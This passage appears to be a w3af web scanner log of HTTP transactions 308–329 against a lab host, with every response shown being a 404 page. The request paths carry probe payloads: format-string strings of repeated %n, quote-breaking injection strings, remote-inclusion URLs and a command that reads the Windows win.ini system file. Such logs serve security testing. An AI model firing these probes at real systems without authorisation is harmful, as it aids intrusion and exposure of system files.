h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/run+type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="308">
                <http-request>
                    <status>GET http://10.12.68.43:31337/a%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="309">
                <http-request>
                    <status>GET http://10.12.68.43:31337/a%27b%22c%27d%22 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="311">
                <http-request>
                    <status>GET http://10.12.68.43:31337/hTtp%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="557" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtp%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="312">
                <http-request>
                    <status>GET http://10.12.68.43:31337/a%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="313">
                <http-request>
                    <status>GET http://10.12.68.43:31337/htTps%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/htTps%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="314">
                <http-request>
                    <status>GET http://10.12.68.43:31337/fTp%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="556" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/fTp%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="315">
                <http-request>
                    <status>GET http://10.12.68.43:31337/hTtp%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="551" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtp%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="316">
                <http-request>
                    <status>GET http://10.12.68.43:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="317">
                <http-request>
                    <status>GET http://10.12.68.43:31337/fTp%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/fTp%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="318">
                <http-request>
                    <status>GET http://10.12.68.43:31337/htTps%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="552" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/htTps%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="319">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="320">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="321">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="322">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="323">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%5E%28%23%24%21%40%23%24%29%28%28%29%29%29%2A%2A%2A%2A%2A%2A HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="324">
                <http-request>
                    <status>GET http://10.12.68.43:31337/http%3A%2F%2Fwww.w3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="561" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A%2F%2Fwww.w3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="326">
                <http-request>
                    <status>GET http://10.12.68.43:31337/http%3A/www.w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="555" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A//www.w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="328">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%2F%2Fw3af.org HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%2F%2Fw3af.org&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="329">
                <http-request>
                    <status>GET http://10.12.68.43:31337/w3af.org HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
